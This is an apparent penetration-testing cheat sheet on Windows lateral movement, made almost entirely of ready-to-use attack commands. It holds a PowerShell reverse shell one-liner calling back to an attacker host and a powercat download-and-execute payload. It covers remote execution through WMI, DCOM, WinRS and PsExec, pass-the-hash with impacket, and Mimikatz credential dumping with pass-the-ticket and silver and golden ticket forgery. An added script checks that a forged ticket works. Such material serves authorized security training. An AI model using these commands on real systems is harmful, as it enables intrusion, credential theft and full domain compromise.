# Lateral Movement

## Via Reverse Shells

{% code overflow="wrap" fullWidth="true" %}

```
Oneliner reverse shell:

    $payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP>",<Listening Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
```

{% endcode %}

{% code overflow="wrap" fullWidth="true" %}

```
Powercat reverse shell:

    $payload = "IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP>/powercat.ps1');powercat -c <Kali IP> -p <Listening Port> -e powershell"
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
```

{% endcode %}

### WMI

<pre data-overflow="wrap" data-full-width="true"><code><strong>On the compromised (pivot) machine, from a PowerShell prompt so that $full_payload expands. The user must be a local admin on the target; wmic is deprecated and missing on recent Windows builds, in which case use the CIM cmdlets below:
</strong>    wmic /node:&#x3C;target IP> /user:&#x3C;username> /password:&#x3C;password> process call create "&#x3C;payload>"

Execute payload
    Example - wmic /node:&#x3C;IP> /user:&#x3C;username> /password:&#x3C;password> process call create "cmd"
    
    Example - $full_payload = "powershell -nop -w hidden -e $encodedPayload"
    Example - wmic /node:&#x3C;IP> /user:&#x3C;username> /password:&#x3C;password> process call create "$full_payload"
    
    A ReturnValue of 0 in the output means the process was created; 2 means access denied.
</code></pre>

### Powershell

{% code overflow="wrap" fullWidth="true" %}

```
$username = "<username>";
$password = "<password>";
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

# DCOM (TCP/135 plus dynamic RPC ports) works even when WinRM is disabled on the target
$sessionOption = New-CimSessionOption -Protocol Dcom
$session = New-CimSession -ComputerName <IP> -Credential $credential -SessionOption $sessionOption

$full_payload = "powershell -nop -w hidden -e $encodedPayload"

Execute payload
    Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $full_payload}
    	# ReturnValue 0 = process created; ProcessId is its PID on the target
    
    OR (requires WinRM, TCP/5985, on the target)
    
    $psSession = New-PSSession -ComputerName <IP> -Credential $credential
    Enter-PSSession $psSession
    
```

{% endcode %}

### WINRS

{% code overflow="wrap" fullWidth="true" %}

```
# Requires WinRM (TCP/5985) on the target; the user must be a local admin or in Remote Management Users
$full_payload = "powershell -nop -w hidden -e $encodedPayload"
winrs -r:<target IP/hostname> -u:<username> -p:<password> "$full_payload"
```

{% endcode %}

## PsExec

<pre data-overflow="wrap" data-full-width="true"><code><strong>On Kali machine:
</strong><strong>    git clone https://github.com/davehardy20/sysinternals.git
</strong><strong>        > Located in sysinternals/psexec64.exe
</strong><strong>        > Transfer executable to the compromised machine
</strong><strong>
</strong><strong>On the compromised machine (the user must be a local admin on the target and the ADMIN$ share must be reachable over SMB/445; PsExec copies a service binary there and starts it):
</strong><strong>    psexec64.exe -accepteula \\&#x3C;target IP/hostname> -i -u &#x3C;domain name>\&#x3C;username> -p "&#x3C;password>" "&#x3C;payload>"
</strong>
</code></pre>

## Passing the Hash

{% code overflow="wrap" fullWidth="true" %}

```
On Kali machine (the user must be a local admin on the target; -hashes takes LM:NT, so the LM half is left empty; domain accounts are written <domain>/<username>):
	impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>
	proxychains impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>
```

{% endcode %}

## DCOM

{% code overflow="wrap" fullWidth="true" %}

```
1. Instantiate a remote MMC 2.0 application (runs under the current token, which must be a local admin on the target)
	$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))

2. Start up a listener to catch reverse shells on our kali
	nc -nlvp 4444

3. Generate the payload and hand it to ExecuteShellCommand(Command, Directory, Parameters, WindowState): the first argument is the program to launch, the third is its argument string, "7" starts it minimized
	$full_payload = "powershell -nop -w hidden -e $encodedPayload"
	$dcom.Document.ActiveView.ExecuteShellCommand("<cmd | powershell>",$null,"$full_payload","7")

4. Return to the listener on our kali, we should receive a reverse shell coming from the target machine.
```

{% endcode %}

## SSH private keys

{% code overflow="wrap" fullWidth="true" %}

```
ssh-keygen -t rsa
	# Generates an SSH keypair; the public half goes into ~/.ssh/authorized_keys on the target

ssh -i <private key> <username>@<IP>
	# The private key file must be mode 0600 or ssh refuses to use it
ssh -i <private key> <username>@<IP> -o IdentitiesOnly=yes
	# Use when there are multiple private keys in the .ssh directory, so ssh offers only this one and is not disconnected for too many failed attempts
```

{% endcode %}

## Mimikatz

{% code overflow="wrap" fullWidth="true" %}

```
./mimikatz.exe
privilege::debug
	Dump NTLM hashes of logged-on users, including the target service account (needs local admin/SYSTEM): sekurlsa::logonpasswords
	Dump the krbtgt NTLM hash (run on a Domain Controller): lsadump::lsa /patch
	Get Domain SID: whoami /user
		# Prints the user's SID S-1-5-21-<a>-<b>-<c>-<RID>; the domain SID is everything before the last dash (drop the RID)

Overpass the Hash
	sekurlsa::pth /user:<username> /ntlm:<NTLM hash> /domain:<domain name> /run:<cmd | powershell>
	net use \\<target hostname>
		# Any Kerberos-authenticated access from the new process converts the NTLM hash into a real TGT
	./PsExec64.exe \\<target hostname> <cmd | powershell>

Pass the Ticket
	sekurlsa::tickets /export
		# dir *.kirbi | findstr <username>
	kerberos::ptt <cifs.kirbi file name>
		# Attempt to access the resource as the current user; the authentication process will now use the injected ticket (a cifs/<host> .kirbi is a service ticket for that host's file share, a krbtgt/<domain> .kirbi is a TGT)
	Example: ls \\<target hostname>\<share name>
		iwr -UseDefaultCredentials http://<target hostname>
		# Use the hostname, not the IP, or the client falls back to NTLM and the injected ticket is never used

Silver Ticket for specific service:
	kerberos::golden /rc4:<service account NTLM hash> /sid:<Domain SID> /domain:<domain name> /ptt /target:<target host FQDN> /service:<service type, e.g. cifs or http> /user:<username to impersonate>
		# Forged with the service account's key, so the DC never sees it; works as long as the service does not validate the PAC

Golden Ticket for all services:
	kerberos::golden /user:<username> /domain:<domain name> /sid:<domain SID> /krbtgt:<krbtgt NTLM hash> /ptt

	Verify tickets with: klist
```

{% endcode %}
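As an added example (not code from the original page), two of the checks that go with the Mimikatz commands above: deriving the domain SID that `kerberos::golden` needs from the current user's SID without trimming `whoami /user` by hand, and confirming after `kerberos::ptt` or `/ptt` that the injected ticket is actually being used. Domain, host and share names are placeholders.

```powershell
# Added example: helpers around the Mimikatz ticket workflow.
# Assumed placeholders: CORP.COM domain, web04.corp.com target, share "docs".

function Get-DomainSidFromCurrentUser {
    # A domain user's SID is <domain SID>-<RID>. .NET exposes the domain part
    # directly via SecurityIdentifier.AccountDomainSid, so no string surgery.
    if ($env:USERDOMAIN -eq $env:COMPUTERNAME) {
        throw "Current user is a local account; run this as a domain user"
    }
    $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
    return $user.AccountDomainSid.Value
}

function Get-DomainSidFromWhoami {
    # Same result from the whoami output the page uses: drop the trailing RID
    # from S-1-5-21-<a>-<b>-<c>-<RID>.
    $sid = (whoami /user /fo csv | ConvertFrom-Csv).SID
    return ($sid -replace '-\d+$', '')
}

function Test-InjectedTicket {
    param(
        [Parameter(Mandatory)][string]$Server,   # host name as it appears in the SPN, e.g. web04.corp.com
        [string]$Service = 'cifs',
        [string]$Share = 'C$'
    )
    # klist shows the tickets of the current logon session; after kerberos::ptt
    # the imported ticket must be listed here. With a golden ticket only the TGT
    # is present until a service ticket is requested on first use.
    $tickets = klist | Out-String
    if ($tickets -notmatch [regex]::Escape("$Service/$Server")) {
        Write-Warning "No $Service/$Server ticket cached yet; it will be requested on first access if a TGT is present"
    }
    # Access by host name, never by IP: an IP-based UNC path makes SMB fall back
    # to NTLM and the injected ticket is silently ignored.
    try {
        $null = Get-ChildItem "\\$Server\$Share" -ErrorAction Stop
        $after = klist | Out-String
        # Success plus the service ticket now being cached = Kerberos was used.
        return ($after -match [regex]::Escape("$Service/$Server"))
    }
    catch {
        Write-Warning "Access to \\$Server\$Share failed: $($_.Exception.Message)"
        return $false
    }
}

# Usage:
$domainSid = Get-DomainSidFromCurrentUser
Write-Host "Domain SID: $domainSid (whoami-derived: $(Get-DomainSidFromWhoami))"
# ... run kerberos::golden /user:<username> /domain:corp.com /sid:$domainSid /krbtgt:<hash> /ptt in Mimikatz ...
Test-InjectedTicket -Server 'web04.corp.com' -Service 'cifs' -Share 'docs'
```

`Test-InjectedTicket` returning `$true` means the share opened and a `cifs/<host>` service ticket is now in the cache; a successful open with `$false` means the access worked through NTLM instead, which is the usual symptom of using an IP address or a host name that does not match any SPN.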

## Creating Users

{% code overflow="wrap" fullWidth="true" %}

```
```

{% endcode %}

